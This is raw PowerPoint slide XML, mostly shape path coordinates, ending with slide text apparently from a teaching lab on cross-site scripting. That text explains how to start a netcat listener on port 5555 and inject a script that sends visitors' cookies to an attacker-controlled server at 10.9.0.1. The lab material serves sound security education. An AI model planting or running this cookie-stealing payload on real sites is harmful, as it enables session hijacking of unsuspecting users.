                  <a:lnTo>
                    <a:pt x="283209" y="227329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281050" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278637" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276098" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319024" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321436" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322706" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322960" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323087" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322452" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321182" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319785" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318007" y="191770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315595" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310515" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307721" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304926" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302259" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299466" y="168910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294512" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292607" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290575" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289432" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288798" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288162" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289814" y="143510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290702" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291973" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295021" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298830" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343916" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342010" y="128270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337311" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331850" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328929" y="119379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325881" y="116839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316737" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298576" y="109220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="135381" y="154939"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="131064" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130301" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129667" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128904" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127380" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126492" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124078" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123190" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123444" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124332" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125856" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127253" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129285" y="185420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131825" y="187960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152907" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159639" y="205739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166370" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173100" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179704" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186054" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192024" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175132" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169291" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166116" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162941" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157987" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153924" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150622" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147447" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144779" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140589" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138937" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137668" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136525" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135381" y="154939"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="200151" y="64770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194436" y="64770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183642" y="67310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159130" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159003" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159384" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171069" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176656" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181991" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184657" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186944" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190626" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192531" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193167" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192785" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191389" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190246" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184911" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182625" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177800" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223139" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224626" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224535" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219582" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214756" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212090" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209423" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201168" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196087" y="118110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192277" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191007" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189737" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190119" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191516" y="97789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192404" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193548" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196596" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202437" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245618" y="85089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243585" y="83820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239014" y="80010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230504" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="72389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="71120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="66039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200151" y="64770"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="103754" y="102870"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78104" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78358" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78612" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79248" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81025" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85851" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88392" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91567" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98298" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100583" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106806" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107442" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107823" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107950" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107866" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="347218" y="134620"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="308101" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310769" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313690" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317373" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320548" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323342" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="326008" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328295" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330073" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331977" y="152400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333501" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335915" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336803" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340232" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340868" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342137" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342900" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343534" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345058" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345948" y="149860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="346836" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347472" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347979" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348742" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349123" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348996" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348233" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="64770" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="60959" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60325" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59817" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64389" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4191" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380" y="125729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="761" y="129539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1777" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3682" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5460" y="132079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8127" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11683" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14731" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17145" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19176" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21081" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28067" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28955" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103754" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89661" y="16510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89534" y="15239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89026" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88519" y="11429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86614" y="10160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85217" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83439" y="8889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81660" y="7620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79121" y="6350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75946" y="5079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72135" y="2539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69087" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66928" y="1270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64770" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="241934" y="113029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239268" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239902" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241300" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241934" y="113029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="248094" y="88900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="207264" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209676" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215265" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219075" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222250" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229870" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231775" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233552" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235076" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237490" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238505" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242570" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243840" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245236" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245872" y="107950"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="106679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247650" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249047" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249554" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250062" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250825" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250571" y="92710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249808" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248920" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="142494" y="35560"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="136525" y="35560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135127" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92709" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136905" y="69850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157099" y="54610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159257" y="53339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160908" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163068" y="49529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163322" y="48260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144399" y="36829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142494" y="35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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28296D9-DC1E-A01E-417C-9B63FA668C29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3035045" y="4528565"/>
            <a:ext cx="7862570" cy="247015"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7862570" h="247014">
                <a:moveTo>
                  <a:pt x="7862315" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7860690" y="48059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7856267" y="87296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7849725" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7841742" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3951731" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3943748" y="133141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937206" y="159591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3932783" y="198828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3931157" y="246887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3929532" y="198828"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3925109" y="159591"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3918567" y="133141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3910583" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20574" y="123443"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12590" y="113746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6048" y="87296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1625" y="48059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B95B8948-B835-499A-422A-8269F242AC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="717550"/>
            <a:ext cx="12244705" cy="5296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974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We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inject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script that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send</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> 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cookies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whoever</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="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is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visiting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our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page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TCP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server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>we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control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 dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="495300" indent="-2546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95934" algn="l"/>
              </a:tabLst>
            </a:pP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separate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terminal,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start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netcat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server!</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="622300">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="565"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>nc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–lknv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5555</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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055"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>you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https://webhook.site/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="60" dirty="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which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gives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you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termporary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URL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listen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from)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Arial MT"/>
              <a:cs typeface="Arial MT"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="561975" indent="-254635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1614"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:tabLst>
                <a:tab pos="562610" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>Inject malicious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script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website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600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.write('&lt;img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src=http://10.9.0.1:5555?c='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+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="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escape(document.cookie)</a:t>
            </a:r>
